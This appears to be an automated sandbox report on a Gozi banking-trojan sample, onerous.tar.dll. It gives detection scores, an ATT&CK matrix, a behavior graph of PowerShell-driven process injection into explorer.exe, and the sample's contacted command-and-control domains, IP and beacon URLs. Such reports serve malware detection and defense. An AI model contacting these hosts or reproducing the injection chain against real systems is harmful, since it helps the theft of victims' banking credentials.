            Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptAccess Token Manipulation1LSA SecretsQuery Registry1SSHKeyloggingData Transfer Size LimitsProxy1Manipulate Device CommunicationManipulate App Store Rankings or Ratings
            Replication Through Removable MediaLaunchdRc.commonRc.commonVirtualization/Sandbox Evasion3Cached Domain CredentialsSecurity Software Discovery11VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
            External Remote ServicesScheduled TaskStartup ItemsStartup ItemsProcess Injection813DCSyncVirtualization/Sandbox Evasion3Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
            Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc FilesystemProcess Discovery3Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
            Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Masquerading/etc/passwd and /etc/shadowApplication Window Discovery1Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
            Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)Invalid Code SignatureNetwork SniffingSystem Owner/User Discovery1Taint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 signatures2 2 Behavior Graph ID: 322295 Sample: onerous.tar.dll Startdate: 24/11/2020 Architecture: WINDOWS Score: 100 70 Multi AV Scanner detection for domain / URL 2->70 72 Found malware configuration 2->72 74 Antivirus / Scanner detection for submitted sample 2->74 76 8 other signatures 2->76 8 mshta.exe 19 2->8         started        11 loaddll32.exe 1 2->11         started        13 iexplore.exe 1 55 2->13         started        16 iexplore.exe 2 82 2->16         started        process3 dnsIp4 92 Suspicious powershell command line found 8->92 18 powershell.exe 2 32 8->18         started        94 Detected Gozi e-Banking trojan 11->94 96 Writes to foreign memory regions 11->96 98 Allocates memory in foreign processes 11->98 100 5 other signatures 11->100 22 control.exe 11->22         started        58 192.168.2.1 unknown unknown 13->58 24 iexplore.exe 29 13->24         started        27 iexplore.exe 30 13->27         started        29 iexplore.exe 39 16->29         started        signatures5 process6 dnsIp7 48 C:\Users\user\AppData\Local\...\jery0dbp.0.cs, UTF-8 18->48 dropped 50 C:\Users\user\AppData\...\1453igkk.cmdline, UTF-8 18->50 dropped 78 Injects code into the Windows Explorer (explorer.exe) 18->78 80 Writes to foreign memory regions 18->80 82 Modifies the context of a thread in another process (thread injection) 18->82 84 Compiles code for process injection (via .Net compiler) 18->84 31 explorer.exe 18->31 injected 35 csc.exe 18->35         started        38 csc.exe 18->38         started        40 conhost.exe 18->40         started        86 Changes memory attributes in foreign processes to executable or writable 22->86 88 Maps a DLL or memory area into another process 22->88 90 Creates a thread in another existing process (thread injection) 22->90 56 api10.laptok.at 47.241.19.44, 49732, 49733, 49750 CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC United States 29->56 file8 signatures9 process10 dnsIp11 60 c56.lepini.at 31->60 62 Changes memory attributes in foreign processes to executable or writable 31->62 64 Writes to foreign memory regions 31->64 66 Allocates memory in foreign processes 31->66 68 4 other signatures 31->68 42 RuntimeBroker.exe 31->42 injected 52 C:\Users\user\AppData\Local\...\1453igkk.dll, PE32 35->52 dropped 44 cvtres.exe 35->44         started        54 C:\Users\user\AppData\Local\...\jery0dbp.dll, PE32 38->54 dropped 46 cvtres.exe 38->46         started        file12 signatures13 process14

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.

            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            onerous.tar.dll48%VirustotalBrowse
            onerous.tar.dll58%ReversingLabsWin32.Trojan.Razy
            onerous.tar.dll100%AviraTR/Crypt.XDR.Gen
            onerous.tar.dll100%Joe Sandbox ML

            Dropped Files

            No Antivirus matches

            Unpacked PE Files

            No Antivirus matches

            Domains

            SourceDetectionScannerLabelLink
            c56.lepini.at12%VirustotalBrowse
            api10.laptok.at12%VirustotalBrowse

            URLs

            SourceDetectionScannerLabelLink
            http://www.mercadolivre.com.br/0%URL Reputationsafe
            http://www.mercadolivre.com.br/0%URL Reputationsafe
            http://www.mercadolivre.com.br/0%URL Reputationsafe
            http://www.mercadolivre.com.br/0%URL Reputationsafe
            http://www.merlin.com.pl/favicon.ico0%URL Reputationsafe
            http://www.merlin.com.pl/favicon.ico0%URL Reputationsafe
            http://www.merlin.com.pl/favicon.ico0%URL Reputationsafe
            http://www.merlin.com.pl/favicon.ico0%URL Reputationsafe
            http://www.dailymail.co.uk/0%URL Reputationsafe
            http://www.dailymail.co.uk/0%URL Reputationsafe
            http://www.dailymail.co.uk/0%URL Reputationsafe
            http://www.dailymail.co.uk/0%URL Reputationsafe
            http://constitution.org/usdeclar.txtC:0%Avira URL Cloudsafe
            http://https://file://USER.ID%lu.exe/upd0%Avira URL Cloudsafe
            http://api10.laptok.at/api1/7U45Cnfq9ga1e8EvVVl5Xw/PEp4yjCXLpMYN/6YsASJ53/HyrTUgpz9vVGeLRPz7uVIoJ/wf0%Avira URL Cloudsafe
            http://api10.laptok.at/api1/tWZ_2FD2Squg/FT7ec2R_2BI/1SrQaK0cbnFssD/EhaYqhgMTbjcAChT30HF6/_2F5KOHdpM0%Avira URL Cloudsafe
            http://image.excite.co.jp/jp/favicon/lep.ico0%URL Reputationsafe
            http://image.excite.co.jp/jp/favicon/lep.ico0%URL Reputationsafe
            http://image.excite.co.jp/jp/favicon/lep.ico0%URL Reputationsafe
            http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
            http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
            http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
            http://%s.com0%URL Reputationsafe
            http://%s.com0%URL Reputationsafe
            http://%s.com0%URL Reputationsafe
            http://www.zhongyicts.com.cn0%URL Reputationsafe
            http://www.zhongyicts.com.cn0%URL Reputationsafe
            http://www.zhongyicts.com.cn0%URL Reputationsafe
            http://busca.igbusca.com.br//app/static/images/favicon.ico0%URL Reputationsafe
            http://busca.igbusca.com.br//app/static/images/favicon.ico0%URL Reputationsafe
            http://busca.igbusca.com.br//app/static/images/favicon.ico0%URL Reputationsafe
            http://www.etmall.com.tw/favicon.ico0%URL Reputationsafe
            http://www.etmall.com.tw/favicon.ico0%URL Reputationsafe
            http://www.etmall.com.tw/favicon.ico0%URL Reputationsafe
            http://it.search.dada.net/favicon.ico0%URL Reputationsafe
            http://it.search.dada.net/favicon.ico0%URL Reputationsafe
            http://it.search.dada.net/favicon.ico0%URL Reputationsafe
            http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
            http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
            http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
            http://search.hanafos.com/favicon.ico0%URL Reputationsafe
            http://search.hanafos.com/favicon.ico0%URL Reputationsafe
            http://search.hanafos.com/favicon.ico0%URL Reputationsafe
            http://cgi.search.biglobe.ne.jp/favicon.ico0%Avira URL Cloudsafe
            http://www.abril.com.br/favicon.ico0%URL Reputationsafe
            http://www.abril.com.br/favicon.ico0%URL Reputationsafe
            http://www.abril.com.br/favicon.ico0%URL Reputationsafe
            https://contoso.com/Icon0%URL Reputationsafe
            https://contoso.com/Icon0%URL Reputationsafe
            https://contoso.com/Icon0%URL Reputationsafe
            http://search.msn.co.jp/results.aspx?q=0%URL Reputationsafe
            http://search.msn.co.jp/results.aspx?q=0%URL Reputationsafe
            http://search.msn.co.jp/results.aspx?q=0%URL Reputationsafe
            http://buscar.ozu.es/0%Avira URL Cloudsafe
            http://busca.igbusca.com.br/0%URL Reputationsafe
            http://busca.igbusca.com.br/0%URL Reputationsafe
            http://busca.igbusca.com.br/0%URL Reputationsafe
            http://www.carterandcone.coml0%URL Reputationsafe
            http://www.carterandcone.coml0%URL Reputationsafe
            http://www.carterandcone.coml0%URL Reputationsafe
            http://search.auction.co.kr/0%URL Reputationsafe
            http://search.auction.co.kr/0%URL Reputationsafe
            http://search.auction.co.kr/0%URL Reputationsafe
            http://busca.buscape.com.br/favicon.ico0%URL Reputationsafe
            http://busca.buscape.com.br/favicon.ico0%URL Reputationsafe
            http://busca.buscape.com.br/favicon.ico0%URL Reputationsafe
            http://www.pchome.com.tw/favicon.ico0%URL Reputationsafe
            http://www.pchome.com.tw/favicon.ico0%URL Reputationsafe
            http://www.pchome.com.tw/favicon.ico0%URL Reputationsafe
            http://browse.guardian.co.uk/favicon.ico0%URL Reputationsafe
            http://browse.guardian.co.uk/favicon.ico0%URL Reputationsafe
            http://browse.guardian.co.uk/favicon.ico0%URL Reputationsafe
            http://google.pchome.com.tw/0%URL Reputationsafe
            http://google.pchome.com.tw/0%URL Reputationsafe
            http://google.pchome.com.tw/0%URL Reputationsafe
            http://www.ozu.es/favicon.ico0%Avira URL Cloudsafe
            http://search.yahoo.co.jp/favicon.ico0%URL Reputationsafe
            http://search.yahoo.co.jp/favicon.ico0%URL Reputationsafe
            http://search.yahoo.co.jp/favicon.ico0%URL Reputationsafe
            http://www.gmarket.co.kr/0%URL Reputationsafe
            http://www.gmarket.co.kr/0%URL Reputationsafe
            http://www.gmarket.co.kr/0%URL Reputationsafe
            http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
            http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
            http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
            http://searchresults.news.com.au/0%URL Reputationsafe
            http://searchresults.news.com.au/0%URL Reputationsafe
            http://searchresults.news.com.au/0%URL Reputationsafe
            http://www.asharqalawsat.com/0%URL Reputationsafe
            http://www.asharqalawsat.com/0%URL Reputationsafe
            http://www.asharqalawsat.com/0%URL Reputationsafe
            http://search.yahoo.co.jp0%URL Reputationsafe
            http://search.yahoo.co.jp0%URL Reputationsafe
            http://search.yahoo.co.jp0%URL Reputationsafe
            http://buscador.terra.es/0%URL Reputationsafe
            http://buscador.terra.es/0%URL Reputationsafe
            http://buscador.terra.es/0%URL Reputationsafe
            http://www.typography.netD0%URL Reputationsafe
            http://www.typography.netD0%URL Reputationsafe
            http://www.typography.netD0%URL Reputationsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            c56.lepini.at
            47.241.19.44
            truetrueunknown
            api10.laptok.at
            47.241.19.44
            truefalseunknown

            URLs from Memory and Binaries

            NameSourceMaliciousAntivirus DetectionReputation
            http://search.chol.com/favicon.icoexplorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpfalse
              high
              http://www.mercadolivre.com.br/explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpfalse
              • URL Reputation: safe
              • URL Reputation: safe
              • URL Reputation: safe
              • URL Reputation: safe
              unknown
              http://www.merlin.com.pl/favicon.icoexplorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpfalse
              • URL Reputation: safe
              • URL Reputation: safe
              • URL Reputation: safe
              • URL Reputation: safe
              unknown
              http://search.ebay.de/explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpfalse
                high
                http://www.mtv.com/explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpfalse
                  high
                  http://www.rambler.ru/explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpfalse
                    high
                    http://www.nifty.com/favicon.icoexplorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpfalse
                      high
                      http://www.dailymail.co.uk/explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      unknown
                      http://www3.fnac.com/favicon.icoexplorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpfalse
                        high
                        http://buscar.ya.com/explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpfalse
                          high
                          http://search.yahoo.com/favicon.icoexplorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpfalse
                            high
                            http://constitution.org/usdeclar.txtC:loaddll32.exe, 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, powershell.exe, 0000001A.00000003.397434238.000002A5846A0000.00000004.00000001.sdmp, control.exe, 00000023.00000002.853077488.0000000000FDE000.00000004.00000001.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://https://file://USER.ID%lu.exe/updloaddll32.exe, 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, powershell.exe, 0000001A.00000003.397434238.000002A5846A0000.00000004.00000001.sdmp, control.exe, 00000023.00000002.853077488.0000000000FDE000.00000004.00000001.sdmptrue
                            • Avira URL Cloud: safe
                            low
                            http://www.sogou.com/favicon.icoexplorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpfalse
                              high
                              http://www.fontbureau.com/designersexplorer.exe, 00000021.00000000.417253230.0000000008B46000.00000002.00000001.sdmpfalse
                                high
                                http://api10.laptok.at/api1/7U45Cnfq9ga1e8EvVVl5Xw/PEp4yjCXLpMYN/6YsASJ53/HyrTUgpz9vVGeLRPz7uVIoJ/wf~DFCE3757A75A0E50D1.TMP.3.dr, {C152A990-2EDD-11EB-90E4-ECF4BB862DED}.dat.3.drfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://asp.usatoday.com/explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpfalse
                                  high
                                  http://api10.laptok.at/api1/tWZ_2FD2Squg/FT7ec2R_2BI/1SrQaK0cbnFssD/EhaYqhgMTbjcAChT30HF6/_2F5KOHdpM{DC6A3E21-2EDD-11EB-90E4-ECF4BB862DED}.dat.20.drfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://fr.search.yahoo.com/explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpfalse
                                    high
                                    http://rover.ebay.comexplorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpfalse
                                      high
                                      http://in.search.yahoo.com/explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpfalse
                                        high
                                        http://img.shopzilla.com/shopzilla/shopzilla.icoexplorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpfalse
                                          high
                                          http://search.ebay.in/explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpfalse
                                            high
                                            http://image.excite.co.jp/jp/favicon/lep.icoexplorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            unknown
                                            https://nuget.org/nuget.exepowershell.exe, 0000001A.00000002.652653486.000002A594731000.00000004.00000001.sdmpfalse
                                              high
                                              http://www.galapagosdesign.com/DPleaseexplorer.exe, 00000021.00000000.417253230.0000000008B46000.00000002.00000001.sdmpfalse
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              unknown
                                              http://%s.comexplorer.exe, 00000021.00000000.412493518.0000000006100000.00000002.00000001.sdmpfalse
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              low
                                              http://msk.afisha.ru/explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpfalse
                                                high
                                                http://www.zhongyicts.com.cnexplorer.exe, 00000021.00000000.417253230.0000000008B46000.00000002.00000001.sdmpfalse
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                unknown
                                                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 0000001A.00000002.427201197.000002A5846D1000.00000004.00000001.sdmpfalse
                                                  high
                                                  http://www.reddit.com/msapplication.xml4.3.drfalse
                                                    high
                                                    http://busca.igbusca.com.br//app/static/images/favicon.icoexplorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpfalse
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    unknown
                                                    http://search.rediff.com/explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpfalse
                                                      high
                                                      http://www.ya.com/favicon.icoexplorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpfalse
                                                        high
                                                        http://www.etmall.com.tw/favicon.icoexplorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        unknown
                                                        http://it.search.dada.net/favicon.icoexplorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        unknown
                                                        http://pesterbdd.com/images/Pester.pngpowershell.exe, 0000001A.00000002.427712389.000002A5848DE000.00000004.00000001.sdmpfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        unknown
                                                        http://search.naver.com/explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpfalse
                                                          high
                                                          http://www.google.ru/explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpfalse
                                                            high
                                                            http://search.hanafos.com/favicon.icoexplorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpfalse
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            unknown
                                                            http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 0000001A.00000002.427712389.000002A5848DE000.00000004.00000001.sdmpfalse
                                                              high
                                                              http://cgi.search.biglobe.ne.jp/favicon.icoexplorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              http://www.abril.com.br/favicon.icoexplorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpfalse
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              unknown
                                                              http://search.daum.net/explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpfalse
                                                                high
                                                                https://contoso.com/Iconpowershell.exe, 0000001A.00000002.652653486.000002A594731000.00000004.00000001.sdmpfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                unknown
                                                                http://search.naver.com/favicon.icoexplorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpfalse
                                                                  high
                                                                  http://search.msn.co.jp/results.aspx?q=explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  unknown
                                                                  http://www.clarin.com/favicon.icoexplorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpfalse
                                                                    high
                                                                    http://buscar.ozu.es/explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    http://kr.search.yahoo.com/explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpfalse
                                                                      high
                                                                      http://search.about.com/explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpfalse
                                                                        high
                                                                        http://busca.igbusca.com.br/explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpfalse
                                                                        • URL Reputation: safe
                                                                        • URL Reputation: safe
                                                                        • URL Reputation: safe
                                                                        unknown
                                                                        http://www.microsofttranslator.com/BVPrev.aspx?ref=IE8Activityexplorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpfalse
                                                                          high
                                                                          http://www.ask.com/explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpfalse
                                                                            high
                                                                            http://www.priceminister.com/favicon.icoexplorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpfalse
                                                                              high
                                                                              https://github.com/Pester/Pesterpowershell.exe, 0000001A.00000002.427712389.000002A5848DE000.00000004.00000001.sdmpfalse
                                                                                high
                                                                                http://www.cjmall.com/explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpfalse
                                                                                  high
                                                                                  http://search.centrum.cz/explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpfalse
                                                                                    high
                                                                                    http://www.carterandcone.comlexplorer.exe, 00000021.00000000.417253230.0000000008B46000.00000002.00000001.sdmpfalse
                                                                                    • URL Reputation: safe
                                                                                    • URL Reputation: safe
                                                                                    • URL Reputation: safe
                                                                                    unknown
                                                                                    http://suche.t-online.de/explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpfalse
                                                                                      high
                                                                                      http://www.google.it/explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpfalse
                                                                                        high
                                                                                        http://search.auction.co.kr/explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpfalse
                                                                                        • URL Reputation: safe
                                                                                        • URL Reputation: safe
                                                                                        • URL Reputation: safe
                                                                                        unknown
                                                                                        http://www.ceneo.pl/explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpfalse
                                                                                          high
                                                                                          http://www.amazon.de/explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpfalse
                                                                                            high
                                                                                            http://sads.myspace.com/explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpfalse
                                                                                              high
                                                                                              http://busca.buscape.com.br/favicon.icoexplorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpfalse
                                                                                              • URL Reputation: safe
                                                                                              • URL Reputation: safe
                                                                                              • URL Reputation: safe
                                                                                              unknown
                                                                                              http://www.pchome.com.tw/favicon.icoexplorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpfalse
                                                                                              • URL Reputation: safe
                                                                                              • URL Reputation: safe
                                                                                              • URL Reputation: safe
                                                                                              unknown
                                                                                              http://browse.guardian.co.uk/favicon.icoexplorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpfalse
                                                                                              • URL Reputation: safe
                                                                                              • URL Reputation: safe
                                                                                              • URL Reputation: safe
                                                                                              unknown
                                                                                              http://google.pchome.com.tw/explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpfalse
                                                                                              • URL Reputation: safe
                                                                                              • URL Reputation: safe
                                                                                              • URL Reputation: safe
                                                                                              unknown
                                                                                              http://list.taobao.com/browse/search_visual.htm?n=15&amp;q=explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpfalse
                                                                                                high
                                                                                                http://www.rambler.ru/favicon.icoexplorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpfalse
                                                                                                  high
                                                                                                  http://uk.search.yahoo.com/explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpfalse
                                                                                                    high
                                                                                                    http://espanol.search.yahoo.com/explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpfalse
                                                                                                      high
                                                                                                      http://www.ozu.es/favicon.icoexplorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpfalse
                                                                                                      • Avira URL Cloud: safe
                                                                                                      unknown
                                                                                                      http://search.sify.com/explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpfalse
                                                                                                        high
                                                                                                        http://openimage.interpark.com/interpark.icoexplorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpfalse
                                                                                                          high
                                                                                                          http://search.yahoo.co.jp/favicon.icoexplorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpfalse
                                                                                                          • URL Reputation: safe
                                                                                                          • URL Reputation: safe
                                                                                                          • URL Reputation: safe
                                                                                                          unknown
                                                                                                          http://search.ebay.com/explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpfalse
                                                                                                            high
                                                                                                            http://www.gmarket.co.kr/explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpfalse
                                                                                                            • URL Reputation: safe
                                                                                                            • URL Reputation: safe
                                                                                                            • URL Reputation: safe
                                                                                                            unknown
                                                                                                            http://www.founder.com.cn/cn/bTheexplorer.exe, 00000021.00000000.417253230.0000000008B46000.00000002.00000001.sdmpfalse
                                                                                                            • URL Reputation: safe
                                                                                                            • URL Reputation: safe
                                                                                                            • URL Reputation: safe
                                                                                                            unknown
                                                                                                            http://search.nifty.com/explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpfalse
                                                                                                              high
                                                                                                              http://searchresults.news.com.au/explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpfalse
                                                                                                              • URL Reputation: safe
                                                                                                              • URL Reputation: safe
                                                                                                              • URL Reputation: safe
                                                                                                              unknown
                                                                                                              http://www.google.si/explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpfalse
                                                                                                                high
                                                                                                                http://www.google.cz/explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpfalse
                                                                                                                  high
                                                                                                                  http://www.soso.com/explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpfalse
                                                                                                                    high
                                                                                                                    http://www.univision.com/explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpfalse
                                                                                                                      high
                                                                                                                      http://search.ebay.it/explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpfalse
                                                                                                                        high
                                                                                                                        http://www.amazon.com/msapplication.xml.3.drfalse
                                                                                                                          high
                                                                                                                          http://images.joins.com/ui_c/fvc_joins.icoexplorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpfalse
                                                                                                                            high
                                                                                                                            http://www.asharqalawsat.com/explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpfalse
                                                                                                                            • URL Reputation: safe
                                                                                                                            • URL Reputation: safe
                                                                                                                            • URL Reputation: safe
                                                                                                                            unknown
                                                                                                                            http://busca.orange.es/explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpfalse
                                                                                                                              high
                                                                                                                              http://cnweb.search.live.com/results.aspx?q=explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpfalse
                                                                                                                                high
                                                                                                                                http://www.twitter.com/msapplication.xml5.3.drfalse
                                                                                                                                  high
                                                                                                                                  http://auto.search.msn.com/response.asp?MT=explorer.exe, 00000021.00000000.412493518.0000000006100000.00000002.00000001.sdmpfalse
                                                                                                                                    high
                                                                                                                                    http://search.yahoo.co.jpexplorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpfalse
                                                                                                                                    • URL Reputation: safe
                                                                                                                                    • URL Reputation: safe
                                                                                                                                    • URL Reputation: safe
                                                                                                                                    unknown
                                                                                                                                    http://www.target.com/explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpfalse
                                                                                                                                      high
                                                                                                                                      http://buscador.terra.es/explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpfalse
                                                                                                                                      • URL Reputation: safe
                                                                                                                                      • URL Reputation: safe
                                                                                                                                      • URL Reputation: safe
                                                                                                                                      unknown
                                                                                                                                      http://www.typography.netDexplorer.exe, 00000021.00000000.417253230.0000000008B46000.00000002.00000001.sdmpfalse
                                                                                                                                      • URL Reputation: safe
                                                                                                                                      • URL Reputation: safe
                                                                                                                                      • URL Reputation: safe
                                                                                                                                      unknown
                                                                                                                                      http://fontfabrik.comexplorer.exe, 00000021.00000000.417253230.0000000008B46000.00000002.00000001.sdmpfalse
                                                                                                                                      • URL Reputation: safe
                                                                                                                                      • URL Reputation: safe
                                                                                                                                      • URL Reputation: safe
                                                                                                                                      unknown
                                                                                                                                      http://search.orange.co.uk/favicon.icoexplorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpfalse
                                                                                                                                      • URL Reputation: safe
                                                                                                                                      • URL Reputation: safe
                                                                                                                                      • URL Reputation: safe
                                                                                                                                      unknown

                                                                                                                                      Contacted IPs

                                                                                                                                      • No. of IPs < 25%
                                                                                                                                      • 25% < No. of IPs < 50%
                                                                                                                                      • 50% < No. of IPs < 75%
                                                                                                                                      • 75% < No. of IPs

                                                                                                                                      Public

                                                                                                                                      IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                      47.241.19.44
                                                                                                                                      unknownUnited States
                                                                                                                                      45102CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdCtrue

                                                                                                                                      Private

                                                                                                                                      IP
